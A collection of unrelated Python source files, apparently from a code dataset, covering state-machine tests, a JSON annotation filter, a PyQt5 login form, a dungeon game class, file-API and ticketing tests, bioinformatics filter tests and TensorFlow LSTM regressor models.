w = WaitState('w', 1)
s.add_transition_on_success(w)
w.add_transition_on_success(g)
exe = Machine('xe', s, end_state_ids=['g'])
exe.run()
assert exe.is_end()
assert exe._curr_state._status == StateStatus.SUCCESS
#assert exe._curr_state.checkStatus(StateStatus.SUCCESS)
def test_object_get_in_transition(capsys):
class SetState(State):
def execute(self, board: Board):
obj = {
'hello': [1, 2, 3],
'name': {
'first': 'test'
}
}
board.set('obj', obj)
obj = {}
return StateStatus.SUCCESS
s = SetState('s')
w = WaitState('w', 1)
i = IdleState('i')
end = IdleState('end')
s.add_transition_on_success(w)
w.add_transition_on_success(i)
i.add_transition(lambda state, board: board.get('obj')
['name']['first'] == 'test', end)
exe = Machine('xe', s, end_state_ids=['end'])
exe.run()
assert exe.is_end()
# Idle state returns RUNNING instead of SUCCESS
assert exe._curr_state._status == StateStatus.RUNNING
| StarcoderdataPython |
9644434 | import argparse
import collections
import json
import logging
from pathlib import Path, PurePath
from utils.log import setup_logging
def main():
with open(__file__, 'r') as f:
_source = f.read()
# Use first line of file docstring as description if it exists.
parser = argparse.ArgumentParser(
description=__doc__.split('\n')[0] if __doc__ else '',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--input-json', required=True)
parser.add_argument('--output-json', required=True)
args = parser.parse_args()
logging_path = str(PurePath(args.output_json).with_suffix('.log'))
setup_logging(logging_path)
file_logger = logging.getLogger(logging_path)
logging.info('Source path: %s', Path(__file__).resolve())
logging.info('Args:\n%s' % vars(args))
with open(args.input_json, 'r') as f:
data = json.load(f)
sequence_images = collections.defaultdict(list)
for image in data['images']:
sequence = PurePath(image['file_name']).parent
sequence_images[sequence].append(image)
valid_images = []
valid_image_ids = set()
removed_images = []
for sequence in sequence_images:
sorted_images = sorted(
sequence_images[sequence],
key=lambda x: int(PurePath(x['file_name']).stem))
valid_images.extend(sorted_images[:-1])
removed_images.append(sorted_images[-1]['file_name'])
logging.info(
'Removing %s images: %s' % (len(removed_images), removed_images))
for image in valid_images:
valid_image_ids.add(image['id'])
annotations = [
x for x in data['annotations'] if x['image_id'] in valid_image_ids
]
logging.info('Kept %s/%s images, %s/%s annotations' %
(len(valid_images), len(data['images']), len(annotations),
len(data['annotations'])))
data['images'] = valid_images
data['annotations'] = annotations
with open(args.output_json, 'w') as f:
json.dump(data, f)
file_logger.info('Source:')
file_logger.info('=======')
file_logger.info(_source)
file_logger.info('=======')
if __name__ == "__main__":
main()
| StarcoderdataPython |
5160040 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'loginPage.ui'
#
# Created by: PyQt5 UI code generator 5.15.6
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
from quirks.mainApp import _login
import loginUnsuccess,homePage
class Ui_loginPage(object):
# def clickedLogin(self):
# email = self.emailEntry.text()
# password = self.passwordEntry.text()
# userId = _login.login(email,password)
# return userId
# print(email)
# print(password)
# def openLoginError(self):
# self.loginError = QtWidgets.QMainWindow()
# self.loginUi = loginUnsuccess.Ui_loginFail()
# self.loginUi.setupUi(self.loginError)
# self.loginError.show()
# def openHomePage(self):
# self.homePage = QtWidgets.QMainWindow()
# self.homeui = homePage.Ui_homePage()
# self.homeui.setupUi(self.homePage)
# self.homePage.show()
# def openHome(self):
# if self.clickedLogin() == 0:
# self.openLoginError()
# else:
# self.openHomePage()
def setupUi(self, loginPage):
loginPage.setObjectName("loginPage")
loginPage.resize(503, 349)
loginPage.setMinimumSize(QtCore.QSize(503, 349))
loginPage.setMaximumSize(QtCore.QSize(503, 349))
self.centralwidget = QtWidgets.QWidget(loginPage)
self.centralwidget.setObjectName("centralwidget")
self.emailText = QtWidgets.QLabel(self.centralwidget)
self.emailText.setGeometry(QtCore.QRect(40, 53, 61, 31))
font = QtGui.QFont()
font.setFamily("Bahnschrift SemiBold")
font.setPointSize(16)
font.setBold(True)
font.setWeight(75)
self.emailText.setFont(font)
self.emailText.setObjectName("emailText")
self.passwordText = QtWidgets.QLabel(self.centralwidget)
self.passwordText.setGeometry(QtCore.QRect(40, 140, 120, 21))
font = QtGui.QFont()
font.setFamily("Bahnschrift SemiBold")
font.setPointSize(16)
font.setBold(True)
font.setWeight(75)
self.passwordText.setFont(font)
self.passwordText.setObjectName("passwordText")
self.emailEntry = QtWidgets.QLineEdit(self.centralwidget)
self.emailEntry.setGeometry(QtCore.QRect(50, 93, 390, 21))
self.emailEntry.setClearButtonEnabled(True)
self.emailEntry.setObjectName("emailEntry")
self.passwordEntry = QtWidgets.QLineEdit(self.centralwidget)
self.passwordEntry.setEchoMode(QtWidgets.QLineEdit.Password)
self.passwordEntry.setGeometry(QtCore.QRect(50, 178, 390, 20))
self.passwordEntry.setClearButtonEnabled(True)
self.passwordEntry.setObjectName("passwordEntry")
self.loginButton = QtWidgets.QPushButton(self.centralwidget)#, clicked = lambda: self.clickedLogin())
self.loginButton.setGeometry(QtCore.QRect(260, 242, 91, 31))
font = QtGui.QFont()
font.setFamily("Bahnschrift SemiBold")
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.loginButton.setFont(font)
self.loginButton.setObjectName("loginButton")
self.cancleButton = QtWidgets.QPushButton(self.centralwidget)
self.cancleButton.setGeometry(QtCore.QRect(370, 242, 91, 31))
font = QtGui.QFont()
font.setFamily("Bahnschrift SemiBold")
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.cancleButton.setFont(font)
self.cancleButton.setObjectName("cancleButton")
loginPage.setCentralWidget(self.centralwidget)
self.retranslateUi(loginPage)
QtCore.QMetaObject.connectSlotsByName(loginPage)
def retranslateUi(self, loginPage):
_translate = QtCore.QCoreApplication.translate
loginPage.setWindowTitle(_translate("loginPage", "Login"))
self.emailText.setText(_translate("loginPage", "EMAIL"))
self.passwordText.setText(_translate("loginPage", "PASSWORD"))
self.loginButton.setText(_translate("loginPage", "LOGIN"))
self.cancleButton.setText(_translate("loginPage", "CANCEL"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
loginPage = QtWidgets.QMainWindow()
ui = Ui_loginPage()
ui.setupUi(loginPage)
loginPage.show()
sys.exit(app.exec_())
| StarcoderdataPython |
11208644 | """Merge Stardist Masks."""
| StarcoderdataPython |
6556768 | #!/usr/bin/env python
__author__ = "<NAME>"
__copyright__ = "Copyright 2021, The MUDCake Project"
__credits__ = "<NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>"
__license__ = """MIT License
Copyright (c) 2021 MUDCake Project
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE."""
__version__ = "1.0.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Development"
from DungeonPackage.Character import Character
from DungeonPackage.Class import Class as Class
from DungeonPackage.DungeonData import DungeonData as DungeonData
from DungeonPackage.Item import Item as Item
from DungeonPackage.Npc import Npc as Npc
from DungeonPackage.Race import Race as Race
from DungeonPackage.Room import Room as Room
from DatabaseHandler.DatabaseHandler import DatabaseHandler
class ActiveDungeon:
"""
class for handling active dungeons
"""
def __init__(self, user_ids: [str] = None, character_ids: [str] = None, rooms: [Room] = None, npcs: [Npc] = None,
items: [Item] = None, races: [Race] = None,
classes: [Class] = None, dungeon_data: DungeonData = None):
"""
constructor for ActiveDungeon class
"""
self.user_ids = user_ids
self.character_ids = character_ids
self.rooms = [rooms]
self.room_dick_list = []
self.rooms_objects = []
self.npcs = npcs
self.items = items
self.races = races
self.classes = classes
self.dungeon_data = dungeon_data
self.db_handler = DatabaseHandler()
def add_item(self, item: Item):
"""
adds an item to activeDungeon
:param item: item object
"""
self.items.append(item)
def add_race(self, race: Race):
"""
adds an race to activeDungeon
:param race: race object
"""
self.races.append(race)
def is_dungeon_master_in_game(self) -> bool:
"""
checks if dungeon master is in game
:param item: item object
:return: True if so
"""
return self.user_ids.contains(self.dungeon_data.dungeon_master_id)
def add_room(self, room: Room):
"""
adds an room to activeDungeon
:param room: room object
"""
self.rooms.append(room)
def add_class(self, d_class: Class):
"""
adds an class to activeDungeon
:param item: item object
"""
self.classes.append(d_class)
def add_character(self, character: Character):
""" adds a character object to the active dungeon
Args:
character (Character): character to be added to the active dungeon
Returns: void
"""
self.character_ids.append(character.character_id)
def load_data(self):
raise NotImplementedError
def change_race_visibility(self):
raise NotImplementedError
def change_class_visibility(self):
raise NotImplementedError
def move_character(self):
raise NotImplementedError
def load_rooms(self, dungeon_id):
rooms_dict = self.db_handler.get_all_rooms_by_dungeon_id_as_dict(dungeon_id=dungeon_id)
for room_dict in rooms_dict:
room = {'roomID': room_dict['roomID'], 'name': room_dict['roomName'], 'isStartRoom': bool(room_dict['isStartRoom']),
'description': room_dict['roomDescription'], 'x': room_dict['x'], 'y': room_dict['y'],
'north': bool(room_dict['north']),'east':bool(room_dict['east']), 'south':bool(room_dict['south']),
'west': bool(room_dict['west']), 'npc': {'npcID': room_dict['npcID'], 'name': room_dict['npcName'],
'description': room_dict['npcDescription'], 'equipment': {'itemID': room_dict['npcItemID'],
'name': room_dict['npcItemName'],
'description': room_dict['npcItemDesc']}},
'item': {'itemID': room_dict['roomItemID'], 'name': room_dict['roomItemName'], 'description': room_dict['roomItemDescription']}}
self.room_dick_list.append(room)
self.__parse_rooms(rooms_dict)
def __parse_rooms(self, room_dict):
for room in room_dict:
done_room = Room(room_id=room['roomID'], room_name=room['roomName'], is_start_room=room['isStartRoom'],
room_description=room['roomDescription'], coordinate_x=room['x'], coordinate_y=room['y'],
north=room['north'], east=room['east'], south=room['south'], west=room['west'])
self.rooms_objects.append(done_room)
| StarcoderdataPython |
5142843 | import hashlib
import os
try:
import cart
from utils import random_id_from_collection
except ImportError:
import pytest
import sys
if sys.version_info < (3, 0):
pytestmark = pytest.mark.skip
else:
raise
def test_children(datastore, client):
submission_id = random_id_from_collection(datastore, 'submission', q="file_count:[2 TO *]")
submission_data = datastore.submission.get(submission_id)
file_id = submission_data.files[0].sha256
res = client.file.children(file_id)
assert len(res) >= 1
def test_ascii(datastore, client):
file_id = random_id_from_collection(datastore, 'file')
res = client.file.ascii(file_id)
assert len(res) >= 1
def test_hex(datastore, client):
file_id = random_id_from_collection(datastore, 'file')
res = client.file.hex(file_id)
assert res.startswith('00000000:')
def test_strings(datastore, client):
file_id = random_id_from_collection(datastore, 'file')
res = client.file.strings(file_id)
assert len(res) >= 1
# noinspection PyUnusedLocal
def test_download_to_obj(datastore, client):
file_id = random_id_from_collection(datastore, 'file')
res = client.file.download(file_id)
assert res[:4] == b"CART"
# noinspection PyUnusedLocal
def test_download_to_obj_raw(datastore, client):
file_id = random_id_from_collection(datastore, 'file')
res = client.file.download(file_id, encoding="raw")
assert hashlib.sha256(res).hexdigest() == file_id
# noinspection PyUnusedLocal
def test_download_to_file(datastore, client):
file_id = random_id_from_collection(datastore, 'file')
download_output = "/tmp/download_{}".format(file_id)
try:
client.file.download(file_id, output=download_output)
assert open(download_output, 'rb').read(4) == b"CART"
metadata = cart.get_metadata_only(download_output)
assert file_id == metadata['sha256']
finally:
os.unlink(download_output)
# noinspection PyUnusedLocal
def test_download_to_file_handle(datastore, client):
file_id = random_id_from_collection(datastore, 'file')
download_output = "/tmp/download_{}_fobj".format(file_id)
try:
client.file.download(file_id, output=open(download_output, "wb"))
assert open(download_output, 'rb').read(4) == b"CART"
finally:
os.unlink(download_output)
# noinspection PyUnusedLocal
def test_info(datastore, client):
file_id = random_id_from_collection(datastore, 'file')
res = client.file.info(file_id)
assert res['sha256'] == file_id
# noinspection PyUnusedLocal
def test_result(datastore, client):
file_id = random_id_from_collection(datastore, 'file')
res = client.file.result(file_id)
assert res['file_info']['sha256'] == file_id
# noinspection PyUnusedLocal
def test_result_for_service(datastore, client):
result_id = random_id_from_collection(datastore, 'result')
file_id, service_name, _ = result_id.split('.', 2)
res = client.file.result(file_id, service=service_name)
assert res['file_info']['sha256'] == file_id
assert res['results'][0]['response']['service_name'] == service_name
# noinspection PyUnusedLocal
def test_score(datastore, client):
file_id = random_id_from_collection(datastore, 'file')
res = client.file.score(file_id)
assert res['file_info']['sha256'] == file_id
for k in res['result_keys']:
assert k[:64] == file_id
| StarcoderdataPython |
253634 | <filename>class1/p34_GradientTape.py
import tensorflow as tf
with tf.GradientTape() as tape:
x = tf.Variable(tf.constant(3.0))
y = tf.pow(x, 2)
grad = tape.gradient(y, x)
print(grad)
| StarcoderdataPython |
4812779 | <filename>fraud_networks/tests/test_dispersion_trees.py
from fraud_networks import DispersionTree, DispersionEdges
#from utilities.dispersion_trees import DispersionTree, DispersionEdges
from fraud_networks.utilities import test_data
import networkx as nx
def test_DispersionEdges():
disp_edges = DispersionEdges(test_data.fraud_case01())
assert not disp_edges.edge_dataframe.empty
def test_DispersionTree():
disp_tree = DispersionTree()
assert not disp_tree.edge_dataframe.empty
assert nx.is_arborescence(disp_tree.graph)
| StarcoderdataPython |
4899545 | """
:Copyright: 2006-2021 <NAME>
:License: Revised BSD (see `LICENSE` file for details)
"""
from unittest.mock import patch
import pytest
from pytest import raises
from byceps.events.ticketing import TicketsSold
from byceps.services.shop.order import action_service, action_registry_service
from byceps.services.shop.order import event_service as order_event_service
from byceps.services.shop.order import service as order_service
from byceps.services.ticketing import ticket_service
from byceps.services.ticketing.ticket_creation_service import (
TicketCreationFailed,
)
from .helpers import get_tickets_for_order, mark_order_as_paid, place_order
@pytest.fixture(scope='module')
def ticket_quantity():
return 4
@pytest.fixture
def order(article, ticket_quantity, storefront, orderer):
articles_with_quantity = [(article, ticket_quantity)]
order = place_order(storefront.id, orderer, articles_with_quantity)
yield order
order_service.delete_order(order.id)
@pytest.fixture
def order_action(article, ticket_category):
action_registry_service.register_tickets_creation(
article.item_number, ticket_category.id
)
yield
action_service.delete_actions_for_article(article.item_number)
@patch('byceps.signals.ticketing.tickets_sold.send')
def test_create_tickets(
tickets_sold_signal_send_mock,
admin_app,
article,
ticket_category,
ticket_quantity,
admin_user,
orderer_user,
orderer,
order,
order_action,
):
tickets_before_paid = get_tickets_for_order(order)
assert len(tickets_before_paid) == 0
shop_order_paid_event = mark_order_as_paid(order.id, admin_user.id)
tickets_after_paid = get_tickets_for_order(order)
assert len(tickets_after_paid) == ticket_quantity
for ticket in tickets_after_paid:
assert ticket.owned_by_id == orderer.user_id
assert ticket.used_by_id == orderer.user_id
events = order_event_service.get_events_for_order(order.id)
ticket_created_events = {
event for event in events if event.event_type == 'ticket-created'
}
assert len(ticket_created_events) == ticket_quantity
tickets_sold_event = TicketsSold(
occurred_at=shop_order_paid_event.occurred_at,
initiator_id=admin_user.id,
initiator_screen_name=admin_user.screen_name,
party_id=ticket_category.party_id,
owner_id=orderer_user.id,
owner_screen_name=orderer_user.screen_name,
quantity=ticket_quantity,
)
tickets_sold_signal_send_mock.assert_called_once_with(
None, event=tickets_sold_event
)
# Clean up.
for ticket in tickets_after_paid:
ticket_service.delete_ticket(ticket.id)
@patch('byceps.services.ticketing.ticket_code_service._generate_ticket_code')
def test_create_tickets_with_same_code_fails(
generate_ticket_code_mock,
admin_app,
article,
ticket_category,
ticket_quantity,
admin_user,
orderer,
order,
order_action,
):
generate_ticket_code_mock.side_effect = lambda: 'EQUAL'
with raises(TicketCreationFailed):
mark_order_as_paid(order.id, admin_user.id)
@patch('byceps.services.ticketing.ticket_code_service._generate_ticket_code')
def test_create_tickets_with_temporarily_equal_code_and_retry_succeeds(
generate_ticket_code_mock,
admin_app,
article,
ticket_category,
ticket_quantity,
admin_user,
orderer,
order,
order_action,
):
code_generation_retries = 4 # Depends on implemented default value.
necessary_outer_retries = 5 # Depends on argument to `retry` decorator.
codes = ['EQUAL'] * code_generation_retries * necessary_outer_retries
codes += ['TCKT1', 'TCKT2', 'TCKT3', 'TCKT4']
codes_iter = iter(codes)
generate_ticket_code_mock.side_effect = lambda: next(codes_iter)
tickets_before_paid = get_tickets_for_order(order)
assert len(tickets_before_paid) == 0
mark_order_as_paid(order.id, admin_user.id)
tickets_after_paid = get_tickets_for_order(order)
assert len(tickets_after_paid) == ticket_quantity
# Clean up.
for ticket in tickets_after_paid:
ticket_service.delete_ticket(ticket.id)
| StarcoderdataPython |
1626871 | import csv
import numpy as np
from typing import Dict, List
from PyQt5.QtGui import QImage, QColor
import src.core.config as config
def parse(path: str, num_classes: int) -> Dict[int, List[np.ndarray]]:
with open(path, newline='\n') as csv_file:
data_set = prepare_data_set_dict(num_classes)
data_reader = csv.reader(csv_file, delimiter=',')
i = 0
for row in data_reader:
set_label = int(row[0])
np_set = np.asarray(row[1:], dtype=np.float32)
np_set = np.reshape(np_set, (-1, 28))
data_set[set_label].append(np_set)
i += 1
if i % 1000 == 0:
print('csv string parsed: ', i)
return data_set
def prepare_data_set_dict(num_classes: int) -> Dict[int, list]:
data_set_dict = {}
for i in range(0, num_classes):
data_set_dict[i] = []
return data_set_dict
def dump_image(matrix: np.ndarray, number: int) -> None:
image = QImage(28, 28, QImage.Format_RGB32)
for i in range(0, matrix.shape[0]):
for j in range(0, matrix.shape[1]):
grayscale = matrix[i][j]
image.setPixelColor(i, j, QColor(grayscale, grayscale, grayscale))
image.save('dump/img' + str(number) + '.png')
| StarcoderdataPython |
1701629 | import unittest
import os
import tempfile
from filecmp import cmp
from subprocess import call
import sys
import py_compile
#python -m unittest tests/test_coverage_filter.py
class CoverageFilterTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
#locate the bin and test_data directories
cls.python = sys.executable
cls.base_dir = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
cls.executable = os.path.join(cls.base_dir, "tools", "pvacseq", "transcript_support_level_filter.py")
cls.test_data_dir = os.path.join(cls.base_dir, "tests", "test_data", "transcript_support_level_filter")
def test_module_compiles(self):
self.assertTrue(py_compile.compile(self.executable))
def test_transcript_support_level_filter_runs_and_produces_expected_output(self):
output_file = tempfile.NamedTemporaryFile()
self.assertFalse(call([
self.python,
self.executable,
os.path.join(
self.test_data_dir,
'Test.all_epitopes.tsv'
),
output_file.name
], shell=False))
self.assertTrue(cmp(
output_file.name,
os.path.join(self.test_data_dir, "Test.filtered.default.tsv"),
))
def test_transcript_support_level_filter_runs_and_produces_expected_output(self):
output_file = tempfile.NamedTemporaryFile()
self.assertFalse(call([
self.python,
self.executable,
os.path.join(
self.test_data_dir,
'Test.all_epitopes.tsv'
),
output_file.name,
'--maximum-transcript-support-level', '3'
], shell=False))
self.assertTrue(cmp(
output_file.name,
os.path.join(self.test_data_dir, "Test.filtered.max_tsl_3.tsv"),
))
def test_transcript_support_level_filter_exclude_nas(self):
output_file = tempfile.NamedTemporaryFile()
self.assertFalse(call([
self.python,
self.executable,
os.path.join(
self.test_data_dir,
'Test.all_epitopes.tsv'
),
output_file.name,
'--exclude-NAs',
], shell=False))
self.assertTrue(cmp(
output_file.name,
os.path.join(self.test_data_dir, "Test.filtered.exclude_nas.tsv"),
))
| StarcoderdataPython |
6561340 | # from __future__ import absolute_import, division, print_function, unicode_literals
import tensorflow as tf
from tensorflow import keras
from time import strftime
from corl.model.tf2.common import DelayedCosineDecayRestarts
class GlobalStepMarker(keras.layers.Layer):
'''
Record global steps.
'''
def __init__(self, time_step=None, feat_size=None):
super(GlobalStepMarker, self).__init__()
self.time_step = time_step
self.feat_size = feat_size
# self.seqlen = None
# self.feat = None
# self.feat = keras.Input(
# # A shape tuple (integers), not including the batch size.
# shape=(self.time_step, self.feat_size),
# # The name becomes a key in the dict.
# name='features',
# dtype='float32')
# self.seqlens = keras.Input(
# shape=(1),
# # The name becomes a key in the dict.
# name='seqlens',
# dtype='int32')
# self.inputs = {'features': self.feat, 'seqlens': self.seqlens}
def build(self, input_shape):
super(GlobalStepMarker, self).build(input_shape)
self.global_step = tf.Variable(initial_value=0,
trainable=False,
name="global_step")
# self.seqlen = tf.Variable(name="seqlen",
# initial_value=tf.zeros((1, 1), tf.int32),
# dtype=tf.int32,
# validate_shape=False,
# trainable=False,
# shape=(None, 1)
# # shape=tf.TensorShape([None, 1])
# )
# self.feat = tf.Variable(
# name="features",
# initial_value=tf.zeros((1, self.time_step, self.feat_size),
# tf.float32),
# trainable=False,
# dtype=tf.float32,
# shape=tf.TensorShape([None, self.time_step, self.feat_size]))
def getGlobalStep(self):
return self.global_step
def call(self, inputs):
self.global_step.assign_add(1)
# feat = inputs['features']
# seqlens = inputs['seqlens']
# self.feat.assign(feat)
# self.seqlen.assign(seqlens)
return inputs
def get_config(self):
config = super().get_config().copy()
# config.update({
# 'num_layers': self.num_layers,
# })
return config
class LastRelevant(keras.layers.Layer):
def __init__(self):
super(LastRelevant, self).__init__()
def call(self, inputs):
lstm, seqlens = inputs
batch_size = tf.shape(lstm)[0]
out = tf.gather_nd(
lstm,
tf.stack([tf.range(batch_size),
tf.reshape(seqlens, [-1]) - 1],
axis=1))
# out = tf.reshape(out, shape=(-1, 1))
return out
def get_config(self):
config = super().get_config().copy()
# config.update({
# 'num_layers': self.num_layers,
# })
return config
class Squeeze(keras.layers.Layer):
def __init__(self):
super(Squeeze, self).__init__()
def call(self, inputs):
output = tf.squeeze(inputs)
output.set_shape([None])
return output
def get_config(self):
config = super().get_config().copy()
# config.update({
# 'num_layers': self.num_layers,
# })
return config
class DropoutRate:
def __init__(self, rate, decayed_dropout_start, dropout_decay_steps, seed):
self._rate = rate
self._decayed_dropout_start = decayed_dropout_start
self._dropout_decay_steps = dropout_decay_steps
self._seed = seed
def call(self):
gstep = tf.compat.v1.train.get_or_create_global_step()
def kp():
return tf.multiply(self._kp, 1.0)
def cdr_kp():
return 1.0 - tf.compat.v1.train.cosine_decay_restarts(
learning_rate=self._rate,
global_step=gstep - self._decayed_dropout_start,
first_decay_steps=self._dropout_decay_steps,
t_mul=1.05,
m_mul=0.98,
alpha=0.01)
minv = kp()
if self._decayed_dropout_start is not None:
minv = tf.cond(pred=tf.less(gstep, self._decayed_dropout_start),
true_fn=kp,
false_fn=cdr_kp)
rdu = tf.random.uniform([],
minval=minv,
maxval=1.02,
dtype=tf.float32,
seed=self._seed)
return tf.minimum(1.0, rdu)
class Infer(keras.layers.Layer):
'''
Returns positive code, positive corl, negative code, negative corl
'''
def __init__(self):
super(Infer, self).__init__()
def call(self, inputs):
pos_idx = tf.argmax(input=inputs)
neg_idx = tf.argmin(input=inputs)
posc = tf.gather(self.refs, pos_idx)
pcorl = tf.gather(inputs, pos_idx)
negc = tf.gather(self.refs, neg_idx)
ncorl = tf.gather(inputs, neg_idx)
return posc, pcorl, negc, ncorl
class Worst(keras.layers.Layer):
def __init__(self):
super(Worst, self).__init__()
def call(self, inputs):
sqd = tf.math.squared_difference(inputs, self.target)
bidx = tf.argmax(input=sqd)
max_diff = tf.sqrt(tf.reduce_max(input_tensor=sqd))
predict = tf.gather(inputs, bidx)
actual = tf.gather(self.target, bidx)
return max_diff, predict, actual
@tf.function
def getInputs(time_step, feat_size):
feat = keras.Input(
# A shape tuple (integers), not including the batch size.
shape=(time_step, feat_size),
# The name becomes a key in the dict.
name='features',
dtype='float32')
seqlens = keras.Input(
shape=(),
# The name becomes a key in the dict.
name='seqlens',
dtype='int32')
return [feat, seqlens]
class LSTMRegressorV1:
'''
'''
def __init__(self,
layer_width=200,
time_step=30,
feat_size=3,
dropout_rate=0.5,
decayed_dropout_start=None,
dropout_decay_steps=None,
learning_rate=1e-3,
decayed_lr_start=None,
lr_decay_steps=None,
seed=None):
self._layer_width = layer_width
self._time_step = time_step
self._feat_size = feat_size
self._dropout_rate = dropout_rate
self._decayed_dropout_start = decayed_dropout_start
self._dropout_decay_steps = dropout_decay_steps
self._lr = learning_rate
self._decayed_lr_start = decayed_lr_start
self._lr_decay_steps = lr_decay_steps
self._seed = seed
self.model = None
def getName(self):
return self.__class__.__name__
def getModel(self):
if self.model is not None:
return self.model
print('{} constructing model {}'.format(strftime("%H:%M:%S"),
self.getName()))
feat = keras.Input(
# A shape tuple (integers), not including the batch size.
shape=(self._time_step, self._feat_size),
# The name becomes a key in the dict.
name='features',
dtype='float32')
seqlens = keras.Input(
shape=(1),
# The name becomes a key in the dict.
name='seqlens',
dtype='int32')
inputs = {'features': feat, 'seqlens': seqlens}
# feat = tf.debugging.check_numerics(feat, 'NaN/Inf found in feat')
# seqlens = tf.debugging.check_numerics(seqlens, 'NaN/Inf found in seqlens')
# inputs = getInputs(self._time_step, self._feat_size)
# seqlens = inputs[1]
# gsm = GlobalStepMarker()(feat)
# inputs = inputLayer.getInputs()
# RNN
# choice for regularizer:
# https://machinelearningmastery.com/use-weight-regularization-lstm-networks-time-series-forecasting/
# L1 is to prune less important features, if we have a large feature set
# https://towardsdatascience.com/l1-and-l2-regularization-methods-ce25e7fc831c
units = self._layer_width
layer = feat
nlayer = 2
for _ in range(nlayer):
layer = keras.layers.LSTM(
units=units,
# stateful=True,
return_sequences=True,
# kernel_initializer=keras.initializers.VarianceScaling(),
bias_initializer=tf.constant_initializer(0.1),
# kernel_regularizer=keras.regularizers.l1_l2(0.01, 0.01),
# recurrent_regularizer=reg,
)(layer)
units = units // 2
# extract last_relevant timestep
layer = LastRelevant()((layer, seqlens))
# FCN
layer = keras.layers.Dense(
units=units,
# kernel_initializer='lecun_normal',
# kernel_initializer=keras.initializers.VarianceScaling(),
bias_initializer=tf.constant_initializer(0.1),
activation='selu')(layer)
units = units // 2
nlayer = 3
for i in range(nlayer):
if i == 0:
layer = keras.layers.AlphaDropout(
rate=self._dropout_rate)(layer)
layer = keras.layers.Dense(
units=units,
# kernel_initializer='lecun_normal',
# kernel_initializer=keras.initializers.VarianceScaling(),
bias_initializer=tf.constant_initializer(0.1),
)(layer)
units = units // 2
layer = keras.layers.Dense(
units=units,
# kernel_initializer='lecun_normal',
# kernel_initializer=keras.initializers.VarianceScaling(),
bias_initializer=tf.constant_initializer(0.1),
activation='selu')(layer)
# Output layer
outputs = keras.layers.Dense(
units=1,
# kernel_initializer='lecun_normal',
# kernel_initializer=keras.initializers.VarianceScaling(),
bias_initializer=tf.constant_initializer(0.1),
)(layer)
# outputs = tf.squeeze(outputs)
self.model = keras.Model(inputs=inputs, outputs=outputs)
self.model._name = self.getName()
return self.model
def compile(self):
# decay = tf.keras.experimental.CosineDecayRestarts(self._lr,
# self._lr_decay_steps,
# t_mul=1.02,
# m_mul=0.95,
# alpha=0.095)
optimizer = tf.keras.optimizers.Adam(
learning_rate=self._lr
# amsgrad=True
# clipnorm=0.5
# clipvalue=0.1
)
# optimizer = keras.optimizers.Nadam(learning_rate=self._lr,
# clipvalue=0.15)
self.model.compile(
optimizer=optimizer,
loss='huber_loss',
# metrics=[
# # Already in the "loss" metric
# 'mse',
# # Only available for logistic regressor with prediction >= 0
# 'accuracy'
# # keras.metrics.Precision(),
# # keras.metrics.Recall()
# ],
# trying to fix 'Inputs to eager execution function cannot be Keras symbolic tensors'
# ref: https://github.com/tensorflow/probability/issues/519
experimental_run_tf_function=False)
#TypeError: Error converting shape to a TensorShape: Dimension value must be integer or None or have an __index__ method, got [35, 6].
#input_shape = ([self._time_step, self._feat_size], None)
# input_shape = {[self._time_step, self._feat_size], None}
# self.model.build(input_shape)
print(self.model.summary())
class LSTMRegressorV2:
'''
'''
def __init__(self,
layer_width=200,
num_lstm_layer=3,
num_fcn_layer=3,
time_step=30,
feat_size=3,
dropout_rate=0.5,
decayed_dropout_start=None,
dropout_decay_steps=None,
learning_rate=1e-3,
decayed_lr_start=None,
lr_decay_steps=None,
seed=None):
self._layer_width = layer_width
self._num_lstm_layer = num_lstm_layer
self._num_fcn_layer = num_fcn_layer
self._time_step = time_step
self._feat_size = feat_size
self._dropout_rate = dropout_rate
self._decayed_dropout_start = decayed_dropout_start
self._dropout_decay_steps = dropout_decay_steps
self._lr = learning_rate
self._decayed_lr_start = decayed_lr_start
self._lr_decay_steps = lr_decay_steps
self._seed = seed
self.model = None
def getName(self):
return self.__class__.__name__
def getModel(self):
if self.model is not None:
return self.model
print('{} constructing model {}'.format(strftime("%H:%M:%S"),
self.getName()))
feat = keras.Input(
# A shape tuple (integers), not including the batch size.
shape=(self._time_step, self._feat_size),
# The name becomes a key in the dict.
name='features',
dtype='float32')
# RNN
# choice for regularizer:
# https://machinelearningmastery.com/use-weight-regularization-lstm-networks-time-series-forecasting/
# L1 is to prune less important features, if we have a large feature set
# https://towardsdatascience.com/l1-and-l2-regularization-methods-ce25e7fc831c
layer = feat
for i in range(self._num_lstm_layer):
layer = keras.layers.Bidirectional(keras.layers.LSTM(
units=self._layer_width,
# stateful=True,
return_sequences=True if i+1 < self._num_lstm_layer else False,
# kernel_initializer=keras.initializers.VarianceScaling(),
bias_initializer=tf.constant_initializer(0.1),
# kernel_regularizer=keras.regularizers.l1_l2(0.01, 0.01),
# recurrent_regularizer=reg,
))(layer)
# extract last_relevant timestep
# layer = LastRelevant()((layer, seqlens))
layer = keras.layers.AlphaDropout(self._dropout_rate)(layer)
